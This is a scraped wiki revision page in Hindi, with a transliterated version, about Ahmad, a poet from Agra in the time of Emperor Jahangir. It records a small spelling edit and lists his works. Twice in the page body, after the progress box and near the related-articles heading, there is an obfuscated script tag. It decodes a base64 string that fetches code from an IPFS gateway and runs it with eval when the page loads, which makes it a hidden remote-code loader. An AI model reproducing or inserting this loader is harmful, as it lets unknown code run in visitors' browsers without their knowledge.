Difference between revisions of "अहमद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "शृंगार" to "श्रृंगार")
 
Line 2: Line 2:
 
* इन्होंने अपने 'कोकसार' नामक ग्रंथ की रचना 1621 ई. (सं. 1678, [[आषाढ़]] [[कृष्ण पक्ष]] [[पंचमी]]) में की, इससे इनका जहाँगीर के शासन-काल में विद्यमान होना प्रमाणित है।  
 
* इन्होंने अपने 'कोकसार' नामक ग्रंथ की रचना 1621 ई. (सं. 1678, [[आषाढ़]] [[कृष्ण पक्ष]] [[पंचमी]]) में की, इससे इनका जहाँगीर के शासन-काल में विद्यमान होना प्रमाणित है।  
 
* इनकी रचनाओं में 'अहमद बारामासी', 'रतिविनोद', 'रसविनोद' और 'सामुद्रिक' की गणना भी की जाती है।  
 
* इनकी रचनाओं में 'अहमद बारामासी', 'रतिविनोद', 'रसविनोद' और 'सामुद्रिक' की गणना भी की जाती है।  
* इन ग्रंथों से व्यक्त होता है कि ये शृंगारी भावना के कवि हैं।  
+
* इन ग्रंथों से व्यक्त होता है कि ये श्रृंगारी भावना के कवि हैं।  
 
* [[नागरी प्रचारिणी सभा]] की खोज रिपोर्टों में इन्हें कहीं [[सूफ़ी मत|सूफ़ी]] और कहीं [[वैष्णव]] कहा गया है।  
 
* [[नागरी प्रचारिणी सभा]] की खोज रिपोर्टों में इन्हें कहीं [[सूफ़ी मत|सूफ़ी]] और कहीं [[वैष्णव]] कहा गया है।  
 
* 'सिग्विजय भूषण' में इनके दो कवित्त उद्धृत हैं।  
 
* 'सिग्विजय भूषण' में इनके दो कवित्त उद्धृत हैं।  

Latest revision as of 07:53, 7 November 2017

ahamad (aangrezi: Ahmad) jahaangir badashah ke samakalin agara nivasi kavi the. inaka poora nam tahir ahamad hai.

  • inhoanne apane 'kokasar' namak granth ki rachana 1621 ee. (san. 1678, ashadh krishna paksh panchami) mean ki, isase inaka jahaangir ke shasan-kal mean vidyaman hona pramanit hai.
  • inaki rachanaoan mean 'ahamad baramasi', 'rativinod', 'rasavinod' aur 'samudrik' ki ganana bhi ki jati hai.
  • in granthoan se vyakt hota hai ki ye shrriangari bhavana ke kavi haian.
  • nagari pracharini sabha ki khoj riportoan mean inhean kahian soofi aur kahian vaishnav kaha gaya hai.
  • 'sigvijay bhooshan' mean inake do kavitt uddhrit haian.
  • ye apani prem ki komal kalpana ke lie vishesh prasiddh haian.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. pustak- hindi sahity kosh bhag-2 | sampadak- dhireandr varma (pradhan) | prakashan- jnanamandal limited, varanasi | prishth sankhya- 30

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>